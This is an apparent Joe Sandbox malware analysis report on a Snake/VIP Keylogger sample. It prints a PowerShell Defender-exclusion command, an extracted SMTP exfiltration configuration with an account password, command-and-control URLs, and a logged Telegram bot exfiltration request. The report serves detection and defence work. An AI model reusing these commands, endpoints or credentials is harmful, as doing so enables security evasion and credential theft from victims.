Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Analysis ID:1518592
MD5:48977f1b641a9a3d88329ac470152381
SHA1:d0eb9734f9bdeb6ab50ccad4342f92f4d405d2f0
SHA256:1c829d80809fb2b5f7c2b40cf05064765bf237f655c9ca557e2d5a01f52b4bc6
Tags:exeMassLogger
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe" MD5: 48977F1B641A9A3D88329AC470152381)
    • powershell.exe (PID: 7584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7820 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "defounderlog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "cp1.virtualine.org", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "defounderlog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "cp1.virtualine.org", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x394de:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b81:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38dde:$a4: \Orbitum\User Data\Default\Login Data
                • 0x397bd:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 26 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ParentProcessId: 7412, ParentProcessName: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ProcessId: 7584, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ParentProcessId: 7412, ParentProcessName: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ProcessId: 7584, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ParentProcessId: 7412, ParentProcessName: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ProcessId: 7584, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T21:54:22.614687+020028033053Unknown Traffic192.168.2.749706188.114.97.3443TCP
                2024-09-25T21:54:25.392729+020028033053Unknown Traffic192.168.2.749712188.114.97.3443TCP
                2024-09-25T21:54:28.112281+020028033053Unknown Traffic192.168.2.749716188.114.97.3443TCP
                2024-09-25T21:54:31.873030+020028033053Unknown Traffic192.168.2.749722188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T21:54:21.022131+020028032742Potentially Bad Traffic192.168.2.749703193.122.6.16880TCP
                2024-09-25T21:54:22.069011+020028032742Potentially Bad Traffic192.168.2.749703193.122.6.16880TCP
                2024-09-25T21:54:23.553376+020028032742Potentially Bad Traffic192.168.2.749708193.122.6.16880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "defounderlog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "cp1.virtualine.org", "Port": "587", "Version": "4.4"}
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "defounderlog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "cp1.virtualine.org", "Port": "587", "Version": "4.4"}
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeReversingLabs: Detection: 63%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49723 version: TLS 1.2
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: VZLk.pdb source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: Binary string: VZLk.pdbSHA256 source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 0169F8E9h5_2_0169F631
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 0169FD41h5_2_0169FA88
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DB31E0h5_2_06DB2DC8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DB0D0Dh5_2_06DB0B30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DB1697h5_2_06DB0B30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DB2C19h5_2_06DB2968
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBE959h5_2_06DBE6B0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBE0A9h5_2_06DBDE00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBF209h5_2_06DBEF60
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBCF49h5_2_06DBCCA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DB31E0h5_2_06DB2DC3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBD7F9h5_2_06DBD550
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBE501h5_2_06DBE258
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBF661h5_2_06DBF3B8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBEDB1h5_2_06DBEB08
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBD3A1h5_2_06DBD0F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_06DB0040
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBFAB9h5_2_06DBF810
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DBDC51h5_2_06DBD9A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 4x nop then jmp 06DB31E0h5_2_06DB310E

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49703 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49716 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49722 -> 188.114.97.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: time.windows.com
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 25 Sep 2024 19:54:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
